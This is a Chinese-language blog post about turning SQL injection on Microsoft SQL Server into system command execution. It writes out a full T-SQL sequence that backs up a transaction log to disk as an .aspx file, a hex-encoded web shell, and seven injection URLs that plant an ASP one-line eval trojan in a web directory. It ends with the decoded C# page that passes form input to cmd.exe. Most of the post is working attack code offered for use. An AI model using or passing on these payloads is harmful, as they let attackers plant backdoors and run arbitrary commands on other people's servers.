本文介绍了如何通过SQL注入,在数据库中创建一个book数据库,设置为完整恢复模式,然后插入并执行含有CMD命令的二进制数据,以此来实现从数据库层面执行系统命令。虽然这种方法可能导致乱码,但仍然可以执行DOS命令。同时,文章还展示了如何在ASP.NET中通过按钮触发CMD命令执行,并将输出显示在网页上。
如果该用户能够创建数据库的话
use master
go
create database book
go
use book
go
alter database book set RECOVERY FULL
go
create table cmd (a image)
go
backup database book to disk='c:bookdb.bak' with init
go
backup log book to disk='c:/book.bak' with init
go
insert into cmd (a) values('0x3C25402050616765204C616E67756167653D2243232220436F6E74656E74547970653D22746578742F68746D6C22202076616C6964617465526571756573743D2266616C73652220617370636F6D7061743D227472756522253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E494F2220253E0D0A3C254020696D706F7274206E616D6573706163653D2253797374656D2E446961676E6F73746963732220253E0D0A3C254020496D706F7274204E616D6573706163653D224D6963726F736F66742E57696E33322220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E436F6C6C656374696F6E7322253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E4E657422253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E446174612E53716C436C69656E742220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E546872656164696E672220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E4E65742E536F636B65747322253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E446961676E6F737469637322253E0D0A3C666F726D2069643D2266726D33222072756E61743D22736572766572223E0D0A20202020202020203C6173703A4C6162656C2049443D224C62446F73222072756E61743D227365727665722220546578743D22444F5320436F6D6D616E643A223E3C2F6173703A4C6162656C3E0D0A20202020202020203C6173703A54657874426F782049443D2254657874426F78446F73222072756E61743D22736572766572222057696474683D223439397078223E6E657420757365723C2F6173703A54657874426F783E0D0A20202020202020203C6173703A427574746F6E2049443D22427574746F6E446F73222072756E61743D2273657276657222204F6E436C69636B3D22427574746F6E436D645F436C69636B2220546578743D22434D4422202F3E3C2F62723E0D0A20202020202020203C6173703A54657874426F782049443D2254657874426F78446F7343222072756E61743D2273657276657222204865696768743D223330307078222057696474683D2235373070782220426F726465725374796C653D22446F747465642220546578744D6F64653D224D756C74694C696E65223E3C2F6173703A54657874426F783E0D0A20202020202020203C2F666F726D3E0D0A3C7363726970742072756E61743D2273657276657222206C616E6775616E67653D224323223E0D0A20202020202020202020202070726F74656374656420766F696420427574746F6E436D645F436C69636B286F626A6563742073656E6465722C204576656E74417267732065290D0A2020202020202020202020207B0D0A2020202020202020202020202020202054657874426F78446F73432E54657874203D2022223B0D0A2020202020202020202020202020202050726F63657373206D7970726F63657373203D206E65772050726F6365737328293B0D0A2020202020202020202020202020202050726F636573735374617274496E666F204D7950726F636573735374617274496E666F203D206E65772050726F636573735374617274496E666F2822636D642E65786522293B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E5573655368656C6C45786563757465203D2066616C73653B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E52656469726563745374616E646172644F7574707574203D20747275653B0D0A202020202020202020202020202020206D7970726F636573732E5374617274496E666F203D204D7950726F636573735374617274496E666F3B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E417267756D656E7473203D20222F6322202B2054657874426F78446F732E546578743B0D0A202020202020202020202020202020206D7970726F636573732E537461727428293B0D0A2020202020202020202020202020202053747265616D526561646572206D7973747265616D203D206D7970726F636573732E5374616E646172644F75747075743B0D0A2020202020202020202020202020202054657874426F78446F73432E54657874203D206D7973747265616D2E52656164546F456E6428293B0D0A202020202020202020202020202020206D7973747265616D2E436C6F736528293B0D0A2020202020202020202020207D0D0A2020202020202020202020203C2F7363726970743E')
go
backup log book to disk='c:/book.aspx' with init
go
use master
go
drop database book
go
上面的方法可以用来生成对应的aspx页面上运行对应的dos命令
如果不能的话,就可以利用上面的方法,使用已有的数据库进行操作,也是可以正常运行dos命令的,但是会出现乱码字符造成代码不能正常运行
下面是几个完整的步骤
1.InjectionURL’;alter database sq_huaweitoys set RECOVERY FULL– (把sql设置成日志完全恢复模式)
2.InjectionURL’;create table cmd (a image)– (新建立一个cmd表)
3.InjectionURL’;backup log sq_huaweitoys to disk = ‘c:/cmd’ with init– (减少备分数据的大小)
4.InjectionURL’;insert into cmd (a) values (’<%%25eval(request("a")):response.end%%25>‘)– (插入一句话木马)
5.InjectionURL’;backup log sq_xxxx to disk = ‘D:/wwwroot/xxxx/wwwroot/hxhack.asp’– (备分日志到WEB路径)
6.InjectionURL’;drop table cmd– (删除新建的cmd表)
7.InjectionURL’;alter database sq_xxxx set RECOVERY SIMPLE–(把sql设置成日志简单恢复模式)
<%@ Page Language="C#" ContentType="text/html" validateRequest="false" aspcompat="true"%>
<%@ import namespace="System.Diagnostics" %>
<%@ Import Namespace="Microsoft.Win32" %>
<%@ Import Namespace="System.Collections"%>
<%@ Import Namespace="System.Diagnostics"%>
<script runat="server">
protected void ButtonCmd_Click(object sender, EventArgs e)
{
TextBoxDosC.Text = "";
Process myprocess = new Process();
ProcessStartInfo MyProcessStartInfo = new ProcessStartInfo("cmd.exe");
MyProcessStartInfo.UseShellExecute = false;
MyProcessStartInfo.RedirectStandardOutput = true;
myprocess.StartInfo = MyProcessStartInfo;
MyProcessStartInfo.Arguments = "/c" + TextBoxDos.Text;
myprocess.Start();
StreamReader mystream = myprocess.StandardOutput;
TextBoxDosC.Text = mystream.ReadToEnd();
mystream.Close();
}
</script>
<form id="frm3" runat="server">
<asp:Label ID="LbDos" runat="server" Text="DOS Command:"></asp:Label>
<asp:TextBox ID="TextBoxDos" runat="server" Width="499px">net user</asp:TextBox>
<asp:Button ID="ButtonDos" runat="server" OnClick="ButtonCmd_Click" Text="CMD" /></br>
<asp:TextBox ID="TextBoxDosC" runat="server" Height="300px" Width="570px" BorderStyle="Dotted" TextMode="MultiLine"></asp:TextBox>
</form>
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
